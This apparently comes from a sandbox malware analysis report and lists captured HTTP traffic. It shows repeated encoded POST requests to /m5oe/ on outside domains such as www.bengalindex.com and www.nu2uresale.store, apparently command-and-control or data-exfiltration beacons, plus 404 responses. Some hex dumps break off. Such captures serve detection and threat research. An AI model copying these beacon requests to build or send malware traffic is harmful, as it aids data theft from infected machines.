        Data Ascii: l48xI=(p4FaXnbLVTAWdCQTwrk1K6-ozfJ7Nd0H9MlvPwdcb23Pn4MMrCVjdlE15b3e41WZPaaBgEwbWZq0C~CWCraeI4mQM8cIz4ww60eXVQm5WySBxHfLsChpOUkT9(Rhh1pEIzsRxTFFMXNFMhyloJFaeegTel3NBwXPBRnBOxhcvrgkxAP~w).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.bengalindex.comConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.bengalindex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bengalindex.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 28 70 34 46 61 58 6e 62 4c 56 54 41 57 2d 61 51 66 33 28 6b 6b 71 36 5f 78 44 66 4a 77 74 64 4b 48 39 49 6c 76 50 59 4e 66 74 4f 33 42 56 51 4d 4e 49 71 56 68 64 6c 45 6b 70 62 7a 42 6f 30 4e 5a 50 4f 38 42 69 4d 5f 62 55 31 71 79 41 32 43 42 53 72 62 58 49 34 37 44 38 38 66 57 44 34 77 77 36 34 6f 58 58 34 63 35 57 71 53 41 47 48 66 4c 75 71 2d 76 65 55 6e 4d 4e 28 52 68 68 70 79 45 49 79 52 52 78 72 72 46 4d 33 4e 58 71 4e 79 32 4e 39 47 4e 65 66 6f 65 2d 6b 61 4d 78 67 65 61 67 70 4b 4c 5f 64 67 62 34 6e 79 73 68 56 6f 69 49 32 4d 52 6f 52 41 57 76 41 36 30 2d 41 4b 73 6d 74 50 38 4a 71 68 66 5a 30 45 28 6e 69 6f 4d 55 35 46 69 62 65 38 52 35 75 64 5a 48 4e 72 73 51 41 41 54 79 52 58 41 4f 70 35 34 6b 28 66 55 71 63 6e 42 43 79 74 46 2d 73 66 63 4e 33 6f 5a 5a 6a 61 5a 50 6d 41 43 61 28 35 32 36 4c 78 5a 68 66 62 7e 7a 51 52 75 46 74 55 38 43 76 73 62 6d 77 51 4c 53 70 4e 45 4a 68 68 78 43 36 52 45 6c 6f 31 28 43 4e 51 32 6b 6e 5a 46 73 41 53 78 36 41 59 43 41 72 62 4d 6f 6b 77 74 4f 6e 71 57 58 67 38 66 78 4e 32 78 6c 28 45 52 5a 38 70 33 2d 76 59 6b 51 51 41 66 73 7e 55 7e 4f 4f 41 36 6e 74 4a 41 64 77 77 35 6e 67 48 45 6f 38 75 49 62 4a 33 6e 67 76 76 33 74 58 63 73 6c 30 45 53 64 41 67 57 6e 62 74 63 30 49 65 38 30 6d 79 77 7a 68 42 4f 71 66 77 74 55 6f 36 68 51 5a 32 77 45 32 45 63 52 65 33 36 5f 63 54 53 70 79 70 61 48 7e 53 58 7a 55 55 5a 4b 39 78 32 5f 42 6b 52 2d 36 79 37 41 48 62 52 61 77 54 63 6e 45 5f 59 38 68 68 39 61 6e 6b 6f 6f 4f 52 33 30 63 77 70 76 64 47 69 38 63 35 35 69 48 41 67 47 35 2d 4f 2d 38 
61 30 48 73 62 6c 30 56 6c 44 35 48 6b 52 47 4a 35 6f 62 46 64 78 39 6b 55 59 4b 28 70 69 70 28 74 71 63 4a 76 41 72 76 35 6a 5f 4d 51 45 6e 39 30 59 38 6e 69 45 69 30 70 7e 6a 6f 48 51 74 63 71 6b 2d 6a 2d 5a 6e 4c 5a 44 48 39 78 6a 77 74 75 49 4e 6f 36 78 50 44 67 38 6b 53 37 28 4e 46 74 74 58 47 36 37 30 43 45 7e 4e 69 73 66 36 74 51 7a 79 65 5f 5a 55 79 65 43 53 44 4c 30 66 65 52 76 39 42 66 71 34 74 38 45 67 4b 61 68 4d 78 62 77 6f 64 34 4d 4f 45 58 51 71 71 47 48 34 42 32 6d 72 31 44 47 35 30 30 4f 78 62 63 52 43 62 32 59 57 66 6b 41 6d 31 46 53 75 46 6f 49 31 39 6b 58 65 45 7a 4d 76 6c 5f 31 38 72 52 64 65 37 33 79 58 43 5a 47 45 45 78 76 69 62 52 32 6e 6e 34 71 6d 50 4f 58 70 43 78 6c 32 43 53 5a 42 78 49 64 58 4d 63 30 73 52 6c 4c 67 48 73 4e 36 48 73 45 50 78 31 48 50 6e 4b 37 6f 71 56 65 61 46 30 48 70 77 67 4a 43 78 69 37 61 36 66 32 56 51 47 37 59 54 6e 55 64 57 7a 52 2d 34 76 75 6d 4e 46 41 5f 54 73 61 4f 37 2d 59 47 33 30 65 6b 75 37 39 6b 69 57 30 4e 77 5f 47 33 4f 45 54 5f 61 45 6c 5a 4d 49 56 6
      Source: global traffic | HTTP traffic detected:
        POST /m5oe/ HTTP/1.1
        Host: www.nu2uresale.store
        Connection: close
        Content-Length: 187
        Cache-Control: no-cache
        Origin: http://www.nu2uresale.store
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.nu2uresale.store/m5oe/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        Data Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 59 48 65 6e 30 4b 79 63 64 5a 4e 49 56 7a 37 67 38 45 69 4b 56 70 48 48 6c 35 39 57 7e 57 7e 66 50 36 62 79 46 39 43 6c 66 66 62 55 71 58 66 6f 65 38 69 39 6b 56 65 74 69 6c 33 2d 53 6b 56 6c 61 52 6b 32 69 63 67 58 35 78 66 31 36 67 67 71 43 47 6f 5a 44 37 56 46 74 61 59 37 37 33 55 6f 30 78 6b 74 63 39 58 51 62 57 75 72 44 4c 4f 34 44 65 6a 6d 4d 2d 33 54 35 5a 49 65 44 64 41 65 79 33 5a 78 77 48 4a 6c 5a 64 69 55 42 67 6e 2d 4c 66 53 70 4c 46 6d 54 39 43 68 6a 4d 42 6e 76 30 6c 68 7a 42 77 29 2e 00 00 00 00 00 00 00 00
        Data Ascii: l48xI=Z_W8hqGkqrFOYHen0KycdZNIVz7g8EiKVpHHl59W~W~fP6byF9ClffbUqXfoe8i9kVetil3-SkVlaRk2icgX5xf16ggqCGoZD7VFtaY773Uo0xktc9XQbWurDLO4DejmM-3T5ZIeDdAey3ZxwHJlZdiUBgn-LfSpLFmT9ChjMBnv0lhzBw).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.nu2uresale.storeConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.nu2uresale.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nu2uresale.store/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 62 6b 32 6e 79 72 79 63 61 35 4e 4c 51 7a 37 67 72 55 6a 69 56 70 44 48 6c 34 35 47 7e 6b 79 66 50 72 4c 79 4c 34 65 6c 5a 66 62 55 73 58 65 67 51 63 69 72 6b 56 4c 55 69 6b 47 63 53 6e 35 6c 56 69 63 32 31 4d 67 49 78 78 66 30 37 67 67 70 4d 6d 6f 5a 44 37 70 5a 74 62 59 4e 37 33 63 6f 31 45 77 74 63 2d 28 58 5a 47 75 6d 65 62 4f 34 44 65 28 35 4d 2d 33 70 35 5a 41 30 44 65 49 65 39 42 31 78 78 57 4a 6b 4f 64 69 66 43 67 6d 61 4b 63 33 67 44 47 53 7a 77 44 38 47 46 45 61 5a 78 47 30 48 63 4f 64 71 62 57 4a 58 68 75 65 34 7e 66 66 61 30 74 33 70 78 4a 59 7a 61 67 64 47 43 39 4e 2d 41 4a 78 71 54 39 59 39 72 63 4e 45 65 6b 6c 70 73 58 64 41 56 76 53 4b 4c 5a 4c 38 41 5f 69 61 45 69 6f 6a 4d 45 49 68 52 55 71 61 32 79 73 77 72 6f 76 37 7a 49 6f 5a 39 31 49 6f 31 77 48 41 46 41 66 44 6e 6e 6f 35 58 7a 45 71 43 44 65 2d 37 65 42 4b 78 70 73 61 55 42 76 76 55 76 7a 66 71 65 71 45 6a 48 62 62 4c 4e 65 6c 55 34 79 66 49 54 64 48 58 74 42 4c 34 32 61 71 47 71 52 72 33 30 6f 55 61 63 67 6c 67 47 42 65 56 33 45 35 58 47 53 58 64 38 74 44 61 69 79 48 33 59 61 53 59 42 39 65 34 33 77 47 79 45 4a 33 52 50 6b 51 73 63 62 62 71 72 32 67 31 77 64 7a 33 46 7a 54 4e 53 64 73 70 69 34 34 65 79 70 6d 53 4a 31 33 4d 34 71 2d 48 43 77 52 4d 49 54 76 54 53 61 77 42 30 4b 54 31 52 46 46 4d 4c 66 5f 39 6e 4e 38 32 6d 4d 68 73 6b 4e 35 6f 32 55 4f 5a 56 65 7a 71 4c 39 70 56 49 48 6e 4f 74 65 38 53 38 6c 79 61 6b 38 44 50 57 61 4f 32 53 4b 6b 35 73 34 34 67 4f 52 6d 4e 43 79 5a 63 49 61 43 62 45 49 70 78 4d 
71 49 6e 34 52 32 7e 4b 6c 64 74 63 7a 4e 52 75 70 6f 37 66 42 4e 43 4d 72 44 6d 71 42 53 6b 6c 71 56 50 4f 31 59 68 38 34 73 58 74 6a 32 58 47 28 71 33 74 36 41 6a 63 77 79 72 54 45 4f 44 64 6e 34 6e 65 72 5a 45 2d 4c 39 44 63 35 71 78 45 6c 34 43 2d 43 44 4a 43 33 76 57 6a 6b 4d 7a 64 64 30 35 34 6a 68 6a 79 30 76 42 6b 78 77 74 63 71 57 35 42 79 65 4c 4e 6a 51 30 44 55 68 6c 6b 57 56 74 64 4f 68 43 30 31 32 4b 55 54 78 4c 6f 44 46 32 6f 39 4e 79 57 49 56 39 61 5a 37 31 4b 5a 61 6b 31 45 64 34 32 32 61 31 6e 38 48 7a 65 34 4d 33 5f 56 48 73 36 39 62 63 67 53 73 6c 79 56 6b 67 4b 63 49 61 31 43 59 73 36 54 36 54 61 6c 4f 66 51 49 67 67 30 65 35 4d 69 49 62 52 44 59 79 79 6a 6d 37 45 74 72 70 6c 31 35 46 42 54 4c 5f 74 58 52 49 6d 71 78 6e 4d 57 49 32 67 73 70 4a 57 52 79 36 34 56 34 7a 69 48 61 58 56 71 54 56 54 43 4b 39 28 61 74 62 63 68 4e 4b 51 65 72 38 75 58 52 64 6f 34 34 6d 42 50 6f 34 5a 79 34 57 70 33 6b 2d 36 48 71 46 43 74 32 46 6a 46 56 64 41 55 43 67 47 74 31 5a 6a 52 66 38 42 4a 46 53 67 46 42 48 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:30 GMTContent-Type: text/htmlContent-Length: 1277Connection: closeETag: "6373c172-4fd"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 20 2d 20 41 4d 48 20 5b 4c 4e 4d 50 5d 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 6d 61 72 67 69 6e 3a 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 37 30 70 78 20 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 34 46 36 46 37 44 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 36 46 36 46 36 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 38 37 41 30 41 37 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 20 7b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 20 0d 0a 09 63 6f 6c 6f 72 3a 23 37 36 39 38 41 37 3b 0d 0a 09 62 6c 72 3a 65 78 70 72 65 73 73 69 6f 6e 28 74 68 69 73 2e 6f 6e 46 6f 63 75 73 3d 74 68 69 73 2e 62 6c 75 72 28 29 29 3b 0d 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 70 72 65 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 0d 
0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 39 70 78 20 73 6f 6c 69 64 20 23 45 37 45 46 46 31 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 30 70 78 20 35 70 78 20 72 67 62 61 28 31 30 30 2c 20 31 30 30 2c 20 31 30 30 2c 20 30 2e 33 29 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 0d 0a 09 5f 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 39 31 39 31 39 31 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 42 4f 44 59 3e 0d 0a 0d 0a 3c 70 72 65 3e 0d 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 3c 2f 68 31 3e 0d 0a e6 82 a8 e6 89 80 e8 ae bf e9 97
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Wed, 30 Nov 2022 00:56:36 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 280
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Wed, 30 Nov 2022 00:56:38 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 280
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Wed, 30 Nov 2022 00:56:40 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 280
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 
aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 
aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 